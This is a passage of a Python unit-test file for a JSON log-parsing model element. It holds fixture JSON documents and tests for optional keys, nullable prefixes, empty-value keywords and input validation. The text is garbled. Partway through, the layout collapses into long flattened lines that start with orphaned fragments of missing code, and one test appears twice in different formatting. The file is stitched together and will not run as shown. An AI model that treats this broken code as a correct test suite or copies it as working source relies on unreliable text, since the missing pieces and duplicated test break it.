    b'"Close", "onclick": "CloseDoc()", "clickable": false}]}}}'
# "value" is absent under "menu".
single_line_missing_key_json = b'{"menu": {"id": "file", "popup": {"menuitem": [{"value": "New", "onclick": "CreateNewDoc()"}, {' \
    b'"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"}]}}}'
single_line_object_instead_of_array = b'{"menu": {"id": "file", "popup": {"menuitem": {"value": "New", "onclick": "CreateNewDoc()"}}}}'
# Deliberately malformed: the closing brackets are missing, so json.loads rejects it.
single_line_invalid_json = b'{"menu": {"id": "file", "value": "File", "popup": {"menuitem": [{"value": "New", "onclick": "CreateNew' \
    b'Doc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"'
single_line_no_match_json = b'{"menu": {"id": "NoMatch", "value": "File", "popup": {"menuitem": [{"value": "New", "onclick": "Create' \
    b'NewDoc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"}]}}}'
# Same content as single_line_with_optional_key_json, keys in a different order.
single_line_different_order_with_optional_key_json = \
    b'{"menu": {"value": "File","popup": {"menuitem": [{"clickable": false, "value": "New", "onclick": "CreateNewDoc()"}, {' \
    b'"onclick": "OpenDoc()", "value": "Open"}, {"value": "Close", "onclick": "CloseDoc()", "clickable": false}]}, "id": "file"}}'
single_line_json_array = b'{"menu": {"id": "file", "value": "File", "popup": ["value", "value", "value"]}}'
# Raw bytes literal: the parser receives the escape sequence, not the "-" it stands for.
single_line_escaped_json = br'{"a": "\x2d"}'
single_line_empty_array = b'{"menu": {"id": "file", "value": "File", "popup": {"menuitem": []}}}'
# Deliberately malformed: a stray ", ," inside the menuitem array.
single_line_multiple_menuitems = \
    b'{"menu": {"id": "file", "value": "File", "popup": {"menuitem": [{"value": "New", "onclick": "CreateNewDoc()"}, {"value": ' \
    b'"Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"}, , ]}}}'
# Multi-line variants of the same document, to check that whitespace and newlines are consumed.
multi_line_json = b"""{
    "menu": {
        "id": "file",
        "value": "File",
        "popup": {
            "menuitem": [
                {"value": "New", "onclick": "CreateNewDoc()"},
                {"value": "Open", "onclick": "OpenDoc()"},
                {"value": "Close", "onclick": "CloseDoc()"}
            ]
        }
    }
}"""
everything_new_line_json = b"""{
    "menu": {
        "id": "file",
        "value": "File",
        "popup": {
            "menuitem": [
                {
                    "value": "New",
                    "onclick": "CreateNewDoc()"
                },
                {
                    "value": "Open",
                    "onclick": "OpenDoc()"
                },
                {
                    "value": "Close",
                    "onclick": "CloseDoc()"
                }
            ]
        }
    }
}"""
array_of_arrays = b'{"a": [["abc", "abc", "abc"], ["abc", "abc"], ["abc"]]}'
# Reference key_parser_dict for the "menu" documents above. A list value describes the element used for every
# array entry; "optional_key_" prefixed keys may be absent from the input.
key_parser_dict = {"menu": {
    "id": DummyFixedDataModelElement("id", b"file"),
    "value": DummyFixedDataModelElement("value", b"File"),
    "popup": {
        "menuitem": [{
            "value": DummyFirstMatchModelElement("buttonNames", [
                DummyFixedDataModelElement("new", b"New"),
                DummyFixedDataModelElement("open", b"Open"),
                DummyFixedDataModelElement("close", b"Close")]),
            "onclick": DummyFirstMatchModelElement("buttonOnclick", [
                DummyFixedDataModelElement("create_new_doc", b"CreateNewDoc()"),
                DummyFixedDataModelElement("open_doc", b"OpenDoc()"),
                DummyFixedDataModelElement("close_doc", b"CloseDoc()")]),
            "optional_key_clickable": DummyFirstMatchModelElement("clickable", [
                DummyFixedDataModelElement("true", b"true"),
                DummyFixedDataModelElement("false", b"false")])
        }, {
            "value": DummyFirstMatchModelElement("buttonNames", [DummyFixedDataModelElement("undo", b"Undo")]),
            "onclick": DummyFirstMatchModelElement("buttonOnclick", [DummyFixedDataModelElement("undo_doc", b"UndoDoc()")]),
            "clickable": DummyFirstMatchModelElement("clickable", [
                DummyFixedDataModelElement("true", b"true"),
                DummyFixedDataModelElement("false", b"false")])
        }]
    }}}
# "ALLOW_ALL" accepts whatever is found below "popup" without a model for it.
key_parser_dict_allow_all = {"menu": {
    "id": DummyFixedDataModelElement("id", b"file"),
    "value": DummyFixedDataModelElement("value", b"File"),
    "popup": "ALLOW_ALL"
}}
key_parser_dict_array = {"menu": {
    "id": DummyFixedDataModelElement("id", b"file"),
    "value": DummyFixedDataModelElement("value", b"File"),
    "popup": [
        DummyFixedDataModelElement("value", b"value")
    ]
}}
key_parser_dict_escaped = {"a": DummyFixedDataModelElement("id", b"-")}
empty_key_parser_dict = {"optional_key_key": DummyFixedDataModelElement("key", b"value")}
key_parser_dict_allow_all_fields = {"menu": {
    "id": DummyFixedDataModelElement("id", b"file")
}}
key_parser_dict_array_of_arrays = {"a": [[DummyFixedDataModelElement("abc", b"abc")]]}
key_parser_dict_newline_in_string = {"a": AnyByteDataModelElement("id")}
key_parser_dict_nested_optional = {"optional_key_a": {
    "optional_key_b": DummyFixedDataModelElement("id", b"file")
}}
def test1get_match_element_valid_match(self):
    """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters."""

    def expect_match(element, data, reparse=True, trim_rest=True, context_data=None):
        """
        Run element over data and compare the result with json.loads(data).

        reparse: take the expected match_string from the context (re-serialised through json), otherwise from the
        parsed value. trim_rest: also set match_data to the bytes following match_string. context_data: raw bytes
        to feed the MatchContext when they differ from data (escape-sequence case).
        """
        value = json.loads(data)
        match_context = DummyMatchContext(data if context_data is None else context_data)
        match_element = element.get_match_element(self.path, match_context)
        if reparse:
            match_context.match_string = str(json.loads(match_context.match_string)).encode()
        else:
            match_context.match_string = str(value).encode()
        if trim_rest:
            match_context.match_data = data[len(match_context.match_string):]
        self.compare_match_results(
            data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children)

    json_model_element = JsonModelElement(self.id_, self.key_parser_dict)
    expect_match(json_model_element, self.single_line_json, trim_rest=False)
    for data in (self.multi_line_json, self.everything_new_line_json):
        expect_match(json_model_element, data)
    # Keys ordered differently than in the key_parser_dict have to be parsed as well.
    expect_match(json_model_element, self.single_line_different_order_with_optional_key_json)
    expect_match(json_model_element, self.single_line_empty_array)

    json_model_element = JsonModelElement(self.id_, self.key_parser_dict_allow_all)
    expect_match(json_model_element, self.single_line_different_order_with_optional_key_json, reparse=False)

    json_model_element = JsonModelElement(self.id_, self.key_parser_dict_array)
    expect_match(json_model_element, self.single_line_json_array, reparse=False)

    # The escape sequence is resolved for the comparison, but the parser sees the raw bytes.
    json_model_element = JsonModelElement(self.id_, self.key_parser_dict_escaped)
    expect_match(json_model_element, self.single_line_escaped_json.decode("unicode-escape").encode(), reparse=False,
                 context_data=self.single_line_escaped_json)

    json_model_element = JsonModelElement(self.id_, self.key_parser_dict_array_of_arrays)
    expect_match(json_model_element, self.array_of_arrays, trim_rest=False)

    # A raw newline inside a string value: it has to be escaped before json.loads accepts the document.
    json_model_element = JsonModelElement(self.id_, self.key_parser_dict_newline_in_string)
    data = b'{"a": "\n"}'
    value = json.loads(data.replace(b"\n", b"\\n"))
    match_context = DummyMatchContext(data)
    match_element = json_model_element.get_match_element(self.path, match_context)
    match_context.match_string = str(json.loads(match_context.match_string.replace(b"\n", b"\\n"))).encode()
    self.compare_match_results(
        data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children)
def test2get_match_element_with_optional_key(self):
    """Validate optional keys with the optional_key_prefix."""

    def expect_match(element, data, reparse=True):
        """
        Run element over data and compare with json.loads(data).

        reparse: take the expected match_string from the context (re-serialised through json), otherwise from the
        parsed value. match_data is always set to the bytes following match_string.
        """
        value = json.loads(data)
        match_context = DummyMatchContext(data)
        match_element = element.get_match_element(self.path, match_context)
        if reparse:
            match_context.match_string = str(json.loads(match_context.match_string)).encode()
        else:
            match_context.match_string = str(value).encode()
        match_context.match_data = data[len(match_context.match_string):]
        self.compare_match_results(
            data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children)

    def expect_no_match(element, data):
        """Run element over data and require that nothing was matched."""
        match_context = DummyMatchContext(data)
        match_element = element.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

    json_model_element = JsonModelElement(self.id_, self.key_parser_dict)
    expect_match(json_model_element, self.single_line_with_optional_key_json)

    # The only key is optional: an empty object, the matching value and a non-matching value.
    for data in (b"{}", b'{"key": "value"}'):
        json_model_element = JsonModelElement(self.id_, self.empty_key_parser_dict)
        expect_match(json_model_element, data, reparse=False)
    json_model_element = JsonModelElement(self.id_, self.empty_key_parser_dict)
    expect_no_match(json_model_element, b'{"key": "another not matching value"}')

    # Nested optional keys.
    json_model_element = JsonModelElement(self.id_, self.key_parser_dict_nested_optional)
    for data in (b'{"a": {"b": "file"}}', b'{}'):
        expect_match(json_model_element, data, reparse=False)
    expect_no_match(json_model_element, b'{"a": {"b": "file1"}}')
def test3get_match_element_with_allow_all(self):
    """Test a simplified key_parser_dict with ALLOW_ALL."""
    json_model_element = JsonModelElement(self.id_, self.key_parser_dict_allow_all)
    # The same document in single-line, multi-line and one-token-per-line form must all be consumed completely.
    for data in (self.single_line_json, self.multi_line_json, self.everything_new_line_json):
        value = json.loads(data)
        match_context = DummyMatchContext(data)
        match_element = json_model_element.get_match_element(self.path, match_context)
        match_context.match_string = str(value).encode()
        match_context.match_data = data[len(match_context.match_string):]
        self.compare_match_results(
            data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children)
def test4get_match_element_with_nullable_values(self):
    """Test if nullable values are working as intended."""
    data_null = b'{"a": null}'
    data_empty = b"{}"
    data_object_null = b'{"a": {"b": null}}'

    def expect_match(element, data):
        """Run element over data and compare with json.loads(data); match_string is normalised through json."""
        value = json.loads(data)
        match_context = DummyMatchContext(data)
        match_element = element.get_match_element(self.path, match_context)
        match_context.match_string = str(json.loads(match_context.match_string)).encode()
        self.compare_match_results(
            data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children)

    # Each entry: a key_parser_dict using the "+" nullable prefix and the payloads it has to accept.
    accepted_cases = [
        # plain value, then a JSON null in its place
        ({"+a": DummyFixedDataModelElement("a", b"a")}, [b'{"a": "a"}', data_null]),
        # the string "null" is an ordinary value, distinct from a JSON null
        ({"+a": DummyFixedDataModelElement("a", b"null")}, [b'{"a": "null"}', data_null]),
        # "null" used as key name
        ({"+null": DummyFixedDataModelElement("a", b"null")}, [b'{"null": "null"}', b'{"null": null}']),
        # nullable array
        ({"+a": [DummyFixedDataModelElement("a", b"a")]}, [b'{"a": ["a"]}', data_null]),
        # nullable nested object
        ({"+a": {"b": DummyFixedDataModelElement("b", b"b")}}, [b'{"a": {"b": "b"}}', data_null]),
    ]
    for key_parser_dict, payloads in accepted_cases:
        json_model_element = JsonModelElement(self.id_, key_parser_dict)
        for data in payloads:
            expect_match(json_model_element, data)

    # A null below a key that is not itself nullable must not match.
    json_model_element = JsonModelElement(self.id_, {"+a": {"b": DummyFixedDataModelElement("b", b"null")}})
    match_context = DummyMatchContext(data_object_null)
    match_element = json_model_element.get_match_element(self.path, match_context)
    self.compare_no_match_results(data_object_null, match_element, match_context)

    # "+" and the optional_key_ prefix can be combined in either order.
    for key in ("+optional_key_a", "optional_key_+a"):
        json_model_element = JsonModelElement(self.id_, {key: DummyFixedDataModelElement("a", b"a")})
        for data in (b'{"a": "a"}', data_null, data_empty):
            expect_match(json_model_element, data)
def test5get_match_element_null_value(self):
    """Test if null keys and values can be used."""

    def expect_match(element, data):
        """Run element over data and compare with json.loads(data); match_string is taken from the parsed value."""
        value = json.loads(data)
        match_context = DummyMatchContext(data)
        match_element = element.get_match_element(self.path, match_context)
        match_context.match_string = str(value).encode()
        match_context.match_data = data[len(match_context.match_string):]
        self.compare_match_results(
            data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children)

    # "NULL_OBJECT" accepts a JSON null for the key "null".
    key_parser_dict = {
        "works": DummyFirstMatchModelElement("id", [
            DummyFixedDataModelElement("abc", b"abc"),
            DummyFixedDataModelElement("123", b"123")]),
        "null": "NULL_OBJECT"
    }
    json_model_element = JsonModelElement(self.id_, key_parser_dict)
    expect_match(json_model_element, b"""{
    "works": "123",
    "null": null
}""")

    # Without a nullable marker a null in place of the nested object is not accepted.
    json_model_element = JsonModelElement(self.id_, {"a": {"b": DummyFixedDataModelElement("c", b"c")}})
    expect_match(json_model_element, b"""{"a": {"b": "c"}}""")
    data = b"""{"a": null}"""
    match_context = DummyMatchContext(data)
    match_element = json_model_element.get_match_element(self.path, match_context)
    self.compare_no_match_results(data, match_element, match_context)
z" }""".encode("utf-8") json_model_element = JsonModelElement(self.id_, key_parser_dict) value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) def test7get_match_element_same_value_as_key(self): """Test if object with the same key-value pairs are parsed correctly.""" key_parser_dict = {"abc": DummyFirstMatchModelElement("first", [ DummyFixedDataModelElement("abc", b"abc"), DummyFixedDataModelElement("abc", b"ab"), DummyFixedDataModelElement("abc", b"bc"), DummyFixedDataModelElement("abc", b"ba"), DummyFixedDataModelElement("abc", b"b"), DummyFixedDataModelElement("abc", b"d")])} data = b"""{"abc":"abc"}""" json_model_element = JsonModelElement(self.id_, key_parser_dict) value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b"""{"abc":"ab"}""" json_model_element = JsonModelElement(self.id_, key_parser_dict) value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b"""{"abc":"bc"}""" json_model_element = JsonModelElement(self.id_, key_parser_dict) 
def test7get_match_element_same_value_as_key(self):
    """Test if object with the same key-value pairs are parsed correctly."""
    # Every alternative is a substring or permutation of the key "abc"; the parser must match on the value only.
    key_parser_dict = {"abc": DummyFirstMatchModelElement("first", [
        DummyFixedDataModelElement("abc", b"abc"),
        DummyFixedDataModelElement("abc", b"ab"),
        DummyFixedDataModelElement("abc", b"bc"),
        DummyFixedDataModelElement("abc", b"ba"),
        DummyFixedDataModelElement("abc", b"b"),
        DummyFixedDataModelElement("abc", b"d")])}
    payloads = (
        b'{"abc":"abc"}', b'{"abc":"ab"}', b'{"abc":"bc"}', b'{"abc":"b"}', b'{"abc":"d"}', b'{"abc":"ba"}')
    for data in payloads:
        json_model_element = JsonModelElement(self.id_, key_parser_dict)
        value = json.loads(data)
        match_context = DummyMatchContext(data)
        match_element = json_model_element.get_match_element(self.path, match_context)
        match_context.match_string = str(value).encode()
        match_context.match_data = data[len(match_context.match_string):]
        self.compare_match_results(
            data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children)
def test8get_match_element_empty_array_empty_object_null(self):
    """Test if the keywords EMPTY_ARRAY, EMPTY_OBJECT, EMPTY_STRING, and None NULL_OBJECT work properly."""

    def expect_match(element, data, trim_rest=True):
        """
        Run element over data and compare with json.loads(data).

        match_string is re-serialised through json; trim_rest also sets match_data to the bytes after it.
        """
        value = json.loads(data)
        match_context = DummyMatchContext(data)
        match_element = element.get_match_element(self.path, match_context)
        match_context.match_string = str(json.loads(match_context.match_string)).encode()
        if trim_rest:
            match_context.match_data = data[len(match_context.match_string):]
        self.compare_match_results(
            data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children)

    def expect_no_match(element, data):
        """Run element over data and require that nothing was matched."""
        match_context = DummyMatchContext(data)
        match_element = element.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

    key_parser_dict = {"menu": {
        "id": "EMPTY_OBJECT",
        "value": "EMPTY_ARRAY",
        "popup": {
            "menuitem": [{
                "value": "NULL_OBJECT",
                "onclick": DummyFirstMatchModelElement("buttonOnclick", [
                    DummyFixedDataModelElement("create_new_doc", b"CreateNewDoc()"),
                    DummyFixedDataModelElement("open_doc", b"OpenDoc()"),
                    DummyFixedDataModelElement("close_doc", b"CloseDoc()")]),
                "optional_key_clickable": DummyFirstMatchModelElement("clickable", [
                    DummyFixedDataModelElement("true", b"true"),
                    DummyFixedDataModelElement("false", b"false")])
            }]
        }},
        "a": "EMPTY_ARRAY",
        "b": "EMPTY_OBJECT",
        "c": "EMPTY_STRING"
    }
    json_model_element = JsonModelElement(self.id_, key_parser_dict)

    # The "menu" part is shared by most payloads; only the trailing keys a, b, c vary.
    menu = b'{"menu": {"id": {}, "value": [], "popup": {"menuitem": [{"value": null, "onclick": "CreateNewDoc()"}, {"value": null, ' \
        b'"onclick": "OpenDoc()"}, {"value": null, "onclick": "CloseDoc()"}]}}'
    expect_match(json_model_element, menu + b', "a": [], "b": {}, "c": ""}', trim_rest=False)
    # Newlines inside the empty object and the empty array must be tolerated.
    expect_match(json_model_element, b'{"menu": {"id": {\n}, "value": [\n], "popup": {"menuitem": [{"value": null, "onclick": '
                 b'"CreateNewDoc()"}, {"value": null, "onclick": "OpenDoc()"}, {"value": null, "onclick": "CloseDoc()"}]}}, '
                 b'"a": [], "b": {}, "c": ""}')
    expect_match(json_model_element, b'{"menu": {"id": {}, "value": [], "popup": {"menuitem": []}}, "a": [], "b": {}, "c": ""}')

    # The keywords are accepted as the sole entry of a key_parser_dict.
    for keyword in ("EMPTY_ARRAY", "EMPTY_OBJECT", "EMPTY_STRING"):
        JsonModelElement(self.id_, {"a": keyword})

    # A non-empty array, object or string where an empty one is required must not match.
    for tail in (b', "a": ["a"], "b": {}, "c": ""}', b', "a": [], "b": {"a": "a"}, "c": ""}', b', "a": [], "b": {}, "c": "ab"}'):
        expect_no_match(json_model_element, menu + tail)

    # ALLOW_ALL_KEYS applies one model to every key, whatever its name.
    key_parser_dict = {"ALLOW_ALL_KEYS": DummyFirstMatchModelElement("first", [
        DummyFixedDataModelElement("abc", b"abc"),
        DummyFixedDataModelElement("123", b"123")])}
    json_model_element = JsonModelElement(self.id_, key_parser_dict)
    expect_match(json_model_element, b'{"key1": "abc", "afd": "abc", "1234": "123", "&544": "123"}', trim_rest=False)
in val: pos_point = val.find(".") if len(val) - val.find(sign) <= 2: result = format(float(val), "1.%dE" % (val.find(exp) - pos_point))[:-2] result += format(float(val), "1.%dE" % (val.find(exp) - pos_point))[-1] return result return format(float(val), "1.%dE" % (val.find(exp) - pos_point)) return float(val) data = b'{"a": 111.1, "b": 111.1}' value = json.loads(data, parse_float=format_float) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b'{"a": 1E-01, "b": 111.1}' value = json.loads(data, parse_float=format_float) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b'{"a": 111.1, "b": 1E-1}' value = json.loads(data, parse_float=format_float) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b'{"a": 1E-1, "b": 1E-1}' value = json.loads(data, parse_float=format_float) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] 
self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) def test10get_match_element_allow_all_fields(self): """Parse matching substring from MatchContext using the allow_all_fields parameter.""" json_model_element = JsonModelElement(self.id_, self.key_parser_dict_allow_all_fields, allow_all_fields=True) data = self.single_line_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) json_model_element = JsonModelElement(self.id_, self.key_parser_dict_allow_all_fields, allow_all_fields=False) data = self.single_line_json match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test11get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" json_model_element = JsonModelElement(self.id_, self.key_parser_dict) # missing key data = self.single_line_missing_key_json match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # object instead of array data = self.single_line_object_instead_of_array match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # invalid json data = self.single_line_invalid_json match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) 
self.compare_no_match_results(data, match_element, match_context) # child not matching data = self.single_line_no_match_json match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # all keys missing data = b"{}" match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) json_model_element = JsonModelElement(self.id_, self.empty_key_parser_dict) data = b"[]" match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"{[]}" match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b'{"key": []}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) key_parser_dict = {"a": [{"b": DummyFixedDataModelElement("b", b"ef")}]} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"a": [{"b": "fe"}]}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) key_parser_dict = {"a": [DummyFixedDataModelElement("a", b"gh")]} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"a": ["hg"]}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) key_parser_dict = {"a": {"b": DummyFixedDataModelElement("c", b"c")}} json_model_element = 
JsonModelElement(self.id_, key_parser_dict) data = b'{"a": "b"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test12element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, JsonModelElement, "", self.key_parser_dict) # empty element_id self.assertRaises(TypeError, JsonModelElement, None, self.key_parser_dict) # None element_id self.assertRaises(TypeError, JsonModelElement, b"path", self.key_parser_dict) # bytes element_id is not allowed self.assertRaises(TypeError, JsonModelElement, True, self.key_parser_dict) # boolean element_id is not allowed self.assertRaises(TypeError, JsonModelElement, 123, self.key_parser_dict) # integer element_id is not allowed self.assertRaises(TypeError, JsonModelElement, 123.22, self.key_parser_dict) # float element_id is not allowed self.assertRaises(TypeError, JsonModelElement, {"id": "path"}, self.key_parser_dict) # dict element_id is not allowed self.assertRaises(TypeError, JsonModelElement, ["path"], self.key_parser_dict) # list element_id is not allowed self.assertRaises(TypeError, JsonModelElement, [], self.key_parser_dict) # empty list element_id is not allowed self.assertRaises(TypeError, JsonModelElement, (), self.key_parser_dict) # empty tuple element_id is not allowed self.assertRaises(TypeError, JsonModelElement, set(), self.key_parser_dict) # empty set element_id is not allowed def test13key_parser_dict_input_validation(self): """Check if key_parser_dict is validated.""" self.assertRaises(TypeError, JsonModelElement, self.id_, "path") # string key_parser_dict self.assertRaises(TypeError, JsonModelElement, self.id_, None) # None key_parser_dict self.assertRaises(TypeError, JsonModelElement, self.id_, b"path") # bytes key_parser_dict is not allowed self.assertRaises(TypeError, JsonModelElement, self.id_, True) # boolean key_parser_dict 
is not allowed self.assertRaises(TypeError, JsonModelElement, self.id_, 123) # integer key_parser_dict is not allowed self.assertRaises(TypeError, JsonModelElement, self.id_, 123.22) # float key_parser_dict is not allowed # dict key_parser_dict with no ModelElementInterface values is not allowed self.assertRaises(TypeError, JsonModelElement, self.id_, {"id": "path"}) # dict key_parser_dict with list of other lengths than 1 is not allowed. key_parser_dict = copy.deepcopy(self.key_parser_dict) key_parser_dict["menu"]["popup"]["menuitem"] = [] self.assertRaises(ValueError, JsonModelElement, self.id_, key_parser_dict) self.assertRaises(TypeError, JsonModelElement, self.id_, ["path"]) # list key_parser_dict is not allowed self.assertRaises(TypeError, JsonModelElement, self.id_, []) # empty list key_parser_dict is not allowed self.assertRaises(TypeError, JsonModelElement, self.id_, ()) # empty tuple key_parser_dict is not allowed self.assertRaises(TypeError, JsonModelElement, self.id_, set()) # empty set key_parser_dict is not allowed def test14optional_key_prefix_input_validation(self): """Check if optional_key_prefix is validated.""" self.assertRaises(ValueError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix="") self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=None) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=b"path") self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=True) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=123) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=123.22) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix={"id": "path"}) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, 
optional_key_prefix=["path"]) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=[]) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=()) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=set()) def test15nullable_key_prefix_input_validation(self): """Check if optional_key_prefix is validated.""" self.assertRaises(ValueError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix="") self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=None) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=b"path") self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=True) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=123) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=123.22) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix={"id": "path"}) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=["path"]) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=[]) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=()) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=set()) def test16allow_all_fields_input_validation(self): """Check if allow_all_fields is validated.""" self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields="") self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields=None) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, 
allow_all_fields=b"path") self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields=123) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields=123.22) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields={"id": "path"}) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields=["path"]) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields=[]) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields=()) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields=set()) def test17get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = JsonModelElement(self.id_, self.key_parser_dict) data = b"abcdefghijklmnopqrstuvwxyz.!?" 
model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) def test18same_optional_key_and_nullable_key_prefix(self): """Test if an exception is thrown if the optional_key_prefix is the same as the nullable_key_prefix.""" self.assertRaises(ValueError, JsonModelElement, self.id_, self.key_parser_dict, 